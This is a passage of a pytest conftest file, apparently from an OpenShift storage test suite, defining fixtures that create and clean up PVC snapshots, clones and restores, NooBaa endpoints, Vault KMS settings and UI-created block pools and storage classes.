object: OCS object representing OCP OAuth object with HTPasswd IdP
"""
users.create_htpasswd_idp()
cluster = OCS(kind=constants.OAUTH, metadata={"name": "cluster"})
cluster.reload()
def finalizer():
"""
Remove HTPasswd IdP
"""
# TODO(fbalak): remove HTPasswd identityProvider
# cluster.ocp.patch(
# resource_name='cluster',
# params=f'[{ "op": "remove", "path": "/spec/identityProviders" }]'
# )
# users.delete_htpasswd_secret()
request.addfinalizer(finalizer)
return cluster
@pytest.fixture(scope="function")
def user_factory(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(scope="session")
def user_factory_session(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(autouse=True)
def log_alerts(request):
"""
Log alerts at the beginning and end of each test case. At the end of the
test case, print the difference: which new alerts were raised while the
test was running.
"""
teardown = config.RUN["cli_params"].get("teardown")
dev_mode = config.RUN["cli_params"].get("dev_mode")
if teardown:
return
elif dev_mode:
log.info("Skipping alert check for development mode")
return
alerts_before = []
prometheus = None
try:
prometheus = PrometheusAPI()
except Exception:
log.exception("There was a problem with connecting to Prometheus")
def _collect_alerts():
try:
alerts_response = prometheus.get(
"alerts", payload={"silenced": False, "inhibited": False}
)
if alerts_response.ok:
alerts = alerts_response.json().get("data").get("alerts")
log.debug(f"Found alerts: {alerts}")
return alerts
else:
log.warning(
f"There was a problem with collecting alerts for analysis: {alerts_response.text}"
)
return False
except Exception:
log.exception("There was a problem with collecting alerts for analysis")
return False
def _print_diff():
if alerts_before:
alerts_after = _collect_alerts()
if alerts_after:
alerts_new = [
alert for alert in alerts_after if alert not in alerts_before
]
if alerts_new:
log.warning("During test were raised new alerts")
log.warning(alerts_new)
alerts_before = _collect_alerts()
request.addfinalizer(_print_diff)
@pytest.fixture(scope="session", autouse=True)
def ceph_toolbox(request):
"""
This fixture creates the Ceph toolbox pod for manually created deployments,
if it does not already exist.
"""
deploy = config.RUN["cli_params"]["deploy"]
teardown = config.RUN["cli_params"].get("teardown")
skip_ocs = config.ENV_DATA["skip_ocs_deployment"]
deploy_teardown = deploy or teardown
managed_platform = (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
or config.ENV_DATA["platform"].lower() == constants.ROSA_PLATFORM
)
if not (deploy_teardown or skip_ocs) or (managed_platform and not deploy_teardown):
try:
# Creating toolbox pod
setup_ceph_toolbox()
except CommandFailed:
log.info("Failed to create toolbox")
@pytest.fixture(scope="function")
def node_drain_teardown(request):
"""
Tear down function after Node drain
"""
def finalizer():
"""
Make sure that all cluster's nodes are in 'Ready' state and if not,
change them back to 'Ready' state by marking them as schedulable
"""
scheduling_disabled_nodes = [
n.name
for n in get_node_objs()
if n.ocp.get_resource_status(n.name)
== constants.NODE_READY_SCHEDULING_DISABLED
]
if scheduling_disabled_nodes:
schedule_nodes(scheduling_disabled_nodes)
ceph_health_check(tries=60)
request.addfinalizer(finalizer)
@pytest.fixture(scope="function")
def node_restart_teardown(request, nodes):
"""
Make sure all nodes are up and in 'Ready' state and if not,
try to make them 'Ready' by restarting the nodes.
"""
def finalizer():
# Start the powered off nodes
nodes.restart_nodes_by_stop_and_start_teardown()
try:
node.wait_for_nodes_status(status=constants.NODE_READY)
except ResourceWrongStatusException:
# Restart the nodes if in NotReady state
not_ready_nodes = [
n
for n in node.get_node_objs()
if n.ocp.get_resource_status(n.name) == constants.NODE_NOT_READY
]
if not_ready_nodes:
log.info(
f"Nodes in NotReady status found: {[n.name for n in not_ready_nodes]}"
)
nodes.restart_nodes_by_stop_and_start(not_ready_nodes)
node.wait_for_nodes_status(status=constants.NODE_READY)
request.addfinalizer(finalizer)
@pytest.fixture()
def mcg_connection_factory(request, mcg_obj, cld_mgr):
"""
Create a new MCG connection for given platform. If there already exists
a connection for the platform then return this previously created
connection.
"""
created_connections = {}
def _create_connection(platform=constants.AWS_PLATFORM, name=None):
"""
Args:
platform (str): Platform used for connection
name (str): New connection name. If not provided then new name will
be generated. New name will be used only if there is not
existing connection for given platform
Returns:
str: connection name
"""
if platform not in created_connections:
connection_name = name or create_unique_resource_name(
constants.MCG_CONNECTION, platform
)
mcg_obj.create_connection(cld_mgr, platform, connection_name)
created_connections[platform] = connection_name
return created_connections[platform]
def _connections_cleanup():
for platform in created_connections:
mcg_obj.delete_ns_connection(created_connections[platform])
request.addfinalizer(_connections_cleanup)
return _create_connection
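# Illustrative usage sketch: a connection is created once per platform and the
# same name is returned on subsequent calls (test name is hypothetical).
#
#     def test_connection_example(mcg_connection_factory):
#         first = mcg_connection_factory(platform=constants.AWS_PLATFORM)
#         second = mcg_connection_factory(platform=constants.AWS_PLATFORM)
#         assert first == second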
@pytest.fixture()
def ns_resource_factory(
request, mcg_obj, cld_mgr, cloud_uls_factory, mcg_connection_factory
):
"""
Create a namespace resource factory. Calling this fixture creates a new namespace resource.
"""
created_ns_resources = []
def _create_ns_resources(platform=constants.AWS_PLATFORM):
# Create random connection_name
rand_connection = mcg_connection_factory(platform)
# Create the actual namespace resource
rand_ns_resource = create_unique_resource_name(
constants.MCG_NS_RESOURCE, platform
)
if platform == constants.RGW_PLATFORM:
region = None
else:
# TODO: fix this when https://github.com/red-hat-storage/ocs-ci/issues/3338
# is resolved
region = "us-east-2"
target_bucket_name = mcg_obj.create_namespace_resource(
rand_ns_resource,
rand_connection,
region,
cld_mgr,
cloud_uls_factory,
platform,
)
log.info(f"Check validity of NS resource {rand_ns_resource}")
if platform == constants.AWS_PLATFORM:
endpoint = constants.MCG_NS_AWS_ENDPOINT
elif platform == constants.AZURE_PLATFORM:
endpoint = constants.MCG_NS_AZURE_ENDPOINT
elif platform == constants.RGW_PLATFORM:
rgw_conn = RGW()
endpoint, _, _ = rgw_conn.get_credentials()
else:
raise UnsupportedPlatformError(f"Unsupported Platform: {platform}")
mcg_obj.check_ns_resource_validity(
rand_ns_resource, target_bucket_name, endpoint
)
created_ns_resources.append(rand_ns_resource)
return target_bucket_name, rand_ns_resource
def ns_resources_cleanup():
for ns_resource in created_ns_resources:
mcg_obj.delete_ns_resource(ns_resource)
request.addfinalizer(ns_resources_cleanup)
return _create_ns_resources
@pytest.fixture()
def namespace_store_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
@pytest.fixture(scope="session")
def namespace_store_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
@pytest.fixture()
def snapshot_factory(request):
"""
Snapshot factory. Calling this fixture creates a volume snapshot from the
specified PVC
"""
instances = []
def factory(pvc_obj, wait=True, snapshot_name=None):
"""
Args:
pvc_obj (PVC): PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name (str): Name to be provided for snapshot
Returns:
OCS: OCS instance of kind VolumeSnapshot
"""
snap_obj = pvc_obj.create_snapshot(snapshot_name=snapshot_name, wait=wait)
instances.append(snap_obj)
return snap_obj
def finalizer():
"""
Delete the snapshots
"""
snapcontent_objs = []
# Get VolumeSnapshotContent form VolumeSnapshots and delete
# VolumeSnapshots
for instance in instances:
if not instance.is_deleted:
snapcontent_objs.append(
helpers.get_snapshot_content_obj(snap_obj=instance)
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for VolumeSnapshotContents to be deleted
for snapcontent_obj in snapcontent_objs:
snapcontent_obj.ocp.wait_for_delete(
resource_name=snapcontent_obj.name, timeout=240
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def multi_snapshot_factory(snapshot_factory):
"""
Snapshot factory. Calling this fixture creates volume snapshots of each
PVC in the provided list
"""
def factory(pvc_obj, wait=True, snapshot_name_suffix=None):
"""
Args:
pvc_obj (list): List of PVC objects from which snapshots have to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name_suffix (str): Suffix to be added to snapshot
Returns:
list: OCS instances of kind VolumeSnapshot
"""
snapshot = []
for obj in pvc_obj:
log.info(f"Creating snapshot of PVC {obj.name}")
snapshot_name = (
f"{obj.name}-{snapshot_name_suffix}" if snapshot_name_suffix else None
)
snap_obj = snapshot_factory(
pvc_obj=obj, snapshot_name=snapshot_name, wait=wait
)
snapshot.append(snap_obj)
return snapshot
return factory
@pytest.fixture()
def snapshot_restore_factory(request):
"""
Snapshot restore factory. Calling this fixture creates new PVC out of the
specified VolumeSnapshot.
"""
instances = []
def factory(
snapshot_obj,
restore_pvc_name=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
):
"""
Args:
snapshot_obj (OCS): OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_name (str): Name to be provided for restored pvc
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
Returns:
PVC: Restored PVC object
"""
snapshot_info = snapshot_obj.get()
size = size or snapshot_info["status"]["restoreSize"]
restore_pvc_name = restore_pvc_name or (
helpers.create_unique_resource_name(snapshot_obj.name, "restore")
)
if snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHBLOCKPOOL).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHBLOCKPOOL).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_RBD_PVC_RESTORE_YAML
interface = constants.CEPHBLOCKPOOL
elif snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHFILESYSTEM).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHFILESYSTEM).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_CEPHFS_PVC_RESTORE_YAML
interface = constants.CEPHFILESYSTEM
restored_pvc = create_restore_pvc(
sc_name=storageclass,
snap_name=snapshot_obj.name,
namespace=snapshot_obj.namespace,
size=size,
pvc_name=restore_pvc_name,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
)
instances.append(restored_pvc)
restored_pvc.snapshot = snapshot_obj
restored_pvc.interface = interface
if status:
helpers.wait_for_resource_state(restored_pvc, status)
return restored_pvc
def finalizer():
"""
Delete the PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
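# Illustrative usage sketch: snapshot an existing PVC and restore it to a new
# PVC. The fixture combination and values below are a hypothetical example.
#
#     def test_snapshot_restore_example(
#         pvc_factory, snapshot_factory, snapshot_restore_factory
#     ):
#         pvc_obj = pvc_factory(size=5)
#         snap_obj = snapshot_factory(pvc_obj)
#         restored_pvc = snapshot_restore_factory(snapshot_obj=snap_obj)
#         assert restored_pvc.name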
@pytest.fixture()
def multi_snapshot_restore_factory(snapshot_restore_factory):
"""
Snapshot restore factory. Calling this fixture creates set of new PVC out of the
each VolumeSnapshot provided in the list.
"""
def factory(
snapshot_obj,
restore_pvc_suffix=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
wait_each=False,
):
"""
Args:
snapshot_obj (list): List of OCS instances of kind VolumeSnapshot which
have to be restored to new PVCs
restore_pvc_suffix (str): Suffix to be added to pvc name
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
list: Restored PVC objects
"""
new_pvcs = []
status_tmp = status if wait_each else ""
for snap_obj in snapshot_obj:
log.info(f"Creating a PVC from snapshot {snap_obj.name}")
restore_pvc_name = (
f"{snap_obj.name}-{restore_pvc_suffix}" if restore_pvc_suffix else None
)
restored_pvc = snapshot_restore_factory(
snapshot_obj=snap_obj,
restore_pvc_name=restore_pvc_name,
storageclass=storageclass,
size=size,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
status=status_tmp,
)
restored_pvc.snapshot = snapshot_obj
new_pvcs.append(restored_pvc)
if status and not wait_each:
for restored_pvc in new_pvcs:
helpers.wait_for_resource_state(restored_pvc, status)
return new_pvcs
return factory
@pytest.fixture(scope="session", autouse=True)
def collect_logs_fixture(request):
"""
This fixture collects OCS logs after the tier execution, which allows
inspecting the cluster's status regardless of the execution result.
"""
def finalizer():
"""
Tracking both logs separately reduces the chance of collision
"""
if not config.RUN["cli_params"].get("deploy") and not config.RUN[
"cli_params"
].get("teardown"):
if config.REPORTING["collect_logs_on_success_run"]:
collect_ocs_logs("testcases", ocs=False, status_failure=False)
collect_ocs_logs("testcases", ocp=False, status_failure=False)
request.addfinalizer(finalizer)
def get_ready_noobaa_endpoint_count(namespace):
"""
Get the number of ready noobaa endpoints
"""
pods_info = get_pods_having_label(
label=constants.NOOBAA_ENDPOINT_POD_LABEL, namespace=namespace
)
ready_count = 0
for ep_info in pods_info:
container_statuses = ep_info.get("status", {}).get("containerStatuses")
if container_statuses is not None and len(container_statuses) > 0:
if container_statuses[0].get("ready"):
ready_count += 1
return ready_count
@pytest.fixture(scope="function")
def nb_ensure_endpoint_count(request):
"""
Validate and ensure the number of running noobaa endpoints
"""
cls = request.cls
min_ep_count = cls.MIN_ENDPOINT_COUNT
max_ep_count = cls.MAX_ENDPOINT_COUNT
assert min_ep_count <= max_ep_count
namespace = defaults.ROOK_CLUSTER_NAMESPACE
should_wait = False
# Prior to OCS 4.6 the endpoint count was configured directly on the NooBaa CR.
if float(config.ENV_DATA["ocs_version"]) < 4.6:
noobaa = OCP(kind="noobaa", namespace=namespace)
resource = noobaa.get()["items"][0]
endpoints = resource.get("spec", {}).get("endpoints", {})
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
else:
storage_cluster = OCP(kind=constants.STORAGECLUSTER, namespace=namespace)
resource = storage_cluster.get()["items"][0]
resource_name = resource["metadata"]["name"]
endpoints = (
resource.get("spec", {}).get("multiCloudGateway", {}).get("endpoints", {})
)
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if should_wait:
# Wait for the NooBaa endpoint pods to stabilize
try:
for ready_nb_ep_count in TimeoutSampler(
300, 30, get_ready_noobaa_endpoint_count, namespace
):
if min_ep_count <= ready_nb_ep_count <= max_ep_count:
log.info(
f"NooBaa endpoints stabilized. Ready endpoints: {ready_nb_ep_count}"
)
break
log.info(
f"Waiting for the NooBaa endpoints to stabilize. "
f"Current ready count: {ready_nb_ep_count}"
)
except TimeoutExpiredError:
raise TimeoutExpiredError(
"NooBaa endpoints did not stabilize in time.\n"
f"Min count: {min_ep_count}, max count: {max_ep_count}, ready count: {ready_nb_ep_count}"
)
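# Illustrative usage sketch: the fixture reads MIN_ENDPOINT_COUNT and
# MAX_ENDPOINT_COUNT from the requesting test class (class and values below
# are a hypothetical example).
#
#     class TestEndpointScaling:
#         MIN_ENDPOINT_COUNT = 1
#         MAX_ENDPOINT_COUNT = 2
#
#         def test_endpoints(self, nb_ensure_endpoint_count):
#             ...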
@pytest.fixture()
def pvc_clone_factory(request):
"""
Calling this fixture creates a clone from the specified PVC
"""
instances = []
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
):
"""
Args:
pvc_obj (PVC): PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
Returns:
PVC: PVC instance
"""
assert (
pvc_obj.provisioner in constants.OCS_PROVISIONERS
), f"Unknown provisioner in PVC {pvc_obj.name}"
if pvc_obj.provisioner == "openshift-storage.rbd.csi.ceph.com":
clone_yaml = constants.CSI_RBD_PVC_CLONE_YAML
interface = constants.CEPHBLOCKPOOL
elif pvc_obj.provisioner == "openshift-storage.cephfs.csi.ceph.com":
clone_yaml = constants.CSI_CEPHFS_PVC_CLONE_YAML
interface = constants.CEPHFILESYSTEM
size = size or pvc_obj.get().get("spec").get("resources").get("requests").get(
"storage"
)
storageclass = storageclass or pvc_obj.backed_sc
access_mode = access_mode or pvc_obj.get_pvc_access_mode
volume_mode = volume_mode or getattr(pvc_obj, "volume_mode", None)
# Create clone
clone_pvc_obj = pvc.create_pvc_clone(
sc_name=storageclass,
parent_pvc=pvc_obj.name,
clone_yaml=clone_yaml,
pvc_name=clone_name,
namespace=pvc_obj.namespace,
storage_size=size,
access_mode=access_mode,
volume_mode=volume_mode,
)
instances.append(clone_pvc_obj)
clone_pvc_obj.parent = pvc_obj
clone_pvc_obj.volume_mode = volume_mode
clone_pvc_obj.interface = interface
if status:
helpers.wait_for_resource_state(clone_pvc_obj, status)
return clone_pvc_obj
def finalizer():
"""
Delete the cloned PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
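# Illustrative usage sketch: clone an existing PVC and rely on the factory's
# default wait for the Bound state (fixture combination is an example only).
#
#     def test_pvc_clone_example(pvc_factory, pvc_clone_factory):
#         parent_pvc = pvc_factory(size=3)
#         cloned_pvc = pvc_clone_factory(pvc_obj=parent_pvc)
#         assert cloned_pvc.parent == parent_pvc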
@pytest.fixture(scope="session", autouse=True)
def reportportal_customization(request):
if config.REPORTING.get("rp_launch_url"):
request.config._metadata["RP Launch URL:"] = config.REPORTING["rp_launch_url"]
@pytest.fixture()
def multi_pvc_clone_factory(pvc_clone_factory):
"""
Calling this fixture creates clone from each PVC in the provided list of PVCs
"""
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
wait_each=False,
):
"""
Args:
pvc_obj (list): List of PVC objects from which clones have to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
list: Cloned PVC instances
"""
cloned_pvcs = []
status_tmp = status if wait_each else ""
for obj in pvc_obj:
# Create clone
clone_pvc_obj = pvc_clone_factory(
pvc_obj=obj,
clone_name=clone_name,
storageclass=storageclass,
size=size,
access_mode=access_mode,
volume_mode=volume_mode,
status=status_tmp,
)
cloned_pvcs.append(clone_pvc_obj)
if status and not wait_each:
for cloned_pvc in cloned_pvcs:
helpers.wait_for_resource_state(cloned_pvc, status)
return cloned_pvcs
return factory
@pytest.fixture(scope="function")
def multiple_snapshot_and_clone_of_postgres_pvc_factory(
request,
multi_snapshot_factory,
multi_snapshot_restore_factory,
multi_pvc_clone_factory,
):
"""
Calling this fixture creates multiple snapshots & clone of postgres PVC
"""
instances = []
def factory(pvc_size_new, pgsql):
"""
Args:
pvc_size_new (int): Resize/Expand the pvc size
pgsql (obj): Pgsql obj
Returns:
Postgres pod: Pod instances
"""
# Get postgres pvc list obj
postgres_pvcs_obj = pgsql.get_postgres_pvc()
snapshots = multi_snapshot_factory(pvc_obj=postgres_pvcs_obj)
log.info("Created snapshots from all the PVCs and snapshots are in Ready state")
restored_pvc_objs = multi_snapshot_restore_factory(snapshot_obj=snapshots)
log.info("Created new PVCs from all the snapshots")
cloned_pvcs = multi_pvc_clone_factory(
pvc_obj=restored_pvc_objs, volume_mode=constants.VOLUME_MODE_FILESYSTEM
)
log.info("Created new PVCs from all restored volumes")
# Attach a new pgsql pod cloned pvcs
sset_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=cloned_pvcs, postgres_name="postgres-clone", run_benchmark=False
)
instances.extend(sset_list)
# Resize cloned PVCs
for pvc_obj in cloned_pvcs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
new_snapshots = multi_snapshot_factory(pvc_obj=cloned_pvcs)
log.info(
"Created snapshots from all the cloned PVCs"
" and snapshots are in Ready state"
)
new_restored_pvc_objs = multi_snapshot_restore_factory(
snapshot_obj=new_snapshots
)
log.info("Created new PVCs from all the snapshots and in Bound state")
        # Attach a new pgsql pod to the restored PVCs
pgsql_obj_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=new_restored_pvc_objs,
postgres_name="postgres-clone-restore",
run_benchmark=False,
)
instances.extend(pgsql_obj_list)
# Resize restored PVCs
for pvc_obj in new_restored_pvc_objs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
return instances
def finalizer():
"""
Delete the list of pod objects created
"""
for instance in instances:
if not instance.is_deleted:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def es(request):
"""
    Create an in-cluster elastic-search deployment for benchmark-operator tests.
    The name 'es' is used as a shortcut for elastic-search for simplicity.
"""
def teardown():
es.cleanup()
request.addfinalizer(teardown)
es = ElasticSearch()
return es
@pytest.fixture(scope="session")
def setup_ui_session(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="class")
def setup_ui_class(request):
return setup_ui_fixture(request)
@pytest.fixture(scope="function")
def setup_ui(request):
return setup_ui_fixture(request)
def setup_ui_fixture(request):
driver = login_ui()
def finalizer():
close_browser(driver)
request.addfinalizer(finalizer)
return driver
@pytest.fixture(scope="session", autouse=True)
def load_cluster_info_file(request):
"""
This fixture tries to load cluster_info.json file if exists (on cluster
installed via Flexy) and apply the information to the config object (for
example related to disconnected cluster)
"""
load_cluster_info()
@pytest.fixture(scope="function")
def ripsaw(request):
# Create benchmark Operator (formerly ripsaw)
ripsaw = RipSaw()
def teardown():
ripsaw.cleanup()
time.sleep(10)
request.addfinalizer(teardown)
return ripsaw
@pytest.fixture(scope="function")
def pv_encryption_kms_setup_factory(request):
"""
Create vault resources and setup csi-kms-connection-details configMap
"""
vault = KMS.Vault()
def factory(kv_version):
"""
Args:
kv_version(str): KV version to be used, either v1 or v2
Returns:
object: Vault(KMS) object
"""
vault.gather_init_vault_conf()
vault.update_vault_env_vars()
# Check if cert secrets already exist, if not create cert resources
ocp_obj = OCP(kind="secret", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(resource_name="ocs-kms-ca-secret", column="NAME")
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.create_ocs_vault_cert_resources()
# Create vault namespace, backend path and policy in vault
vault_resource_name = create_unique_resource_name("test", "vault")
vault.vault_create_namespace(namespace=vault_resource_name)
vault.vault_create_backend_path(
backend_path=vault_resource_name, kv_version=kv_version
)
vault.vault_create_policy(policy_name=vault_resource_name)
# If csi-kms-connection-details exists, edit the configmap to add new vault config
ocp_obj = OCP(kind="configmap", namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
try:
ocp_obj.get_resource(
resource_name="csi-kms-connection-details", column="NAME"
)
new_kmsid = vault_resource_name
vdict = defaults.VAULT_CSI_CONNECTION_CONF
for key in vdict.keys():
old_key = key
vdict[new_kmsid] = vdict.pop(old_key)
vdict[new_kmsid]["VAULT_BACKEND_PATH"] = vault_resource_name
vdict[new_kmsid]["VAULT_NAMESPACE"] = vault_resource_name
vault.kmsid = vault_resource_name
if kv_version == "v1":
vdict[new_kmsid]["VAULT_BACKEND"] = "kv"
else:
vdict[new_kmsid]["VAULT_BACKEND"] = "kv-v2"
KMS.update_csi_kms_vault_connection_details(vdict)
except CommandFailed as cfe:
if "not found" not in str(cfe):
raise
else:
vault.kmsid = "1-vault"
vault.create_vault_csi_kms_connection_details(kv_version=kv_version)
return vault
def finalizer():
"""
Remove the vault config from csi-kms-connection-details configMap
"""
if len(KMS.get_encryption_kmsid()) > 1:
KMS.remove_kmsid(vault.kmsid)
# Delete the resources in vault
vault.remove_vault_backend_path()
vault.remove_vault_policy()
vault.remove_vault_namespace()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def cephblockpool_factory_ui_class(request, setup_ui_class):
return cephblockpool_factory_ui_fixture(request, setup_ui_class)
@pytest.fixture(scope="session")
def cephblockpool_factory_ui_session(request, setup_ui_session):
return cephblockpool_factory_ui_fixture(request, setup_ui_session)
@pytest.fixture(scope="function")
def cephblockpool_factory_ui(request, setup_ui):
return cephblockpool_factory_ui_fixture(request, setup_ui)
def cephblockpool_factory_ui_fixture(request, setup_ui):
"""
    This function creates a new cephblockpool
"""
instances = []
def factory(
replica=3,
compression=False,
):
"""
Args:
            replica (int): replica size of the pool; 2 and 3 are supported for now
compression (bool): True to enable compression otherwise False
Return:
(ocs_ci.ocs.resource.ocs) ocs object of the CephBlockPool.
"""
blockpool_ui_object = BlockPoolUI(setup_ui)
pool_name, pool_status = blockpool_ui_object.create_pool(
replica=replica, compression=compression
)
if pool_status:
log.info(
f"Pool {pool_name} with replica {replica} and compression {compression} was created and "
f"is in ready state"
)
ocs_blockpool_obj = create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL,
resource_name=pool_name,
)
instances.append(ocs_blockpool_obj)
return ocs_blockpool_obj
else:
blockpool_ui_object.take_screenshot()
if pool_name:
instances.append(
create_ocs_object_from_kind_and_name(
kind=constants.CEPHBLOCKPOOL, resource_name=pool_name
)
)
raise PoolDidNotReachReadyState(
f"Pool {pool_name} with replica {replica} and compression {compression}"
f" did not reach ready state"
)
def finalizer():
"""
        Delete the cephblockpool from the UI and, if that fails, from the CLI
"""
for instance in instances:
try:
instance.get()
except CommandFailed:
log.warning("Pool is already deleted")
continue
blockpool_ui_obj = BlockPoolUI(setup_ui)
if not blockpool_ui_obj.delete_pool(instance.name):
instance.delete()
raise PoolNotDeletedFromUI(
f"Could not delete block pool {instances.name} from UI."
f" Deleted from CLI"
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def storageclass_factory_ui_class(
request, cephblockpool_factory_ui_class, setup_ui_class
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_class, setup_ui_class
)
@pytest.fixture(scope="session")
def storageclass_factory_ui_session(
request, cephblockpool_factory_ui_session, setup_ui_session
):
return storageclass_factory_ui_fixture(
request, cephblockpool_factory_ui_session, setup_ui_session
)
@pytest.fixture(scope="function")
def storageclass_factory_ui(request, cephblockpool_factory_ui, setup_ui):
return storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui)
def storageclass_factory_ui_fixture(request, cephblockpool_factory_ui, setup_ui):
"""
    This function creates a new storageclass
"""
instances = []
def factory(
provisioner=constants.OCS_PROVISIONERS[0],
compression=False,
replica=3,
create_new_pool=False,
encryption=False, # not implemented yet
reclaim_policy=constants.RECLAIM_POLICY_DELETE, # not implemented yet
default_pool=constants.DEFAULT_BLOCKPOOL,
existing_pool=None,
):
"""
Args:
provisioner (str): The name of the provisioner. Default is openshift-storage.rbd.csi.ceph.com
compression (bool): if create_new_pool is True, compression will be set if True.
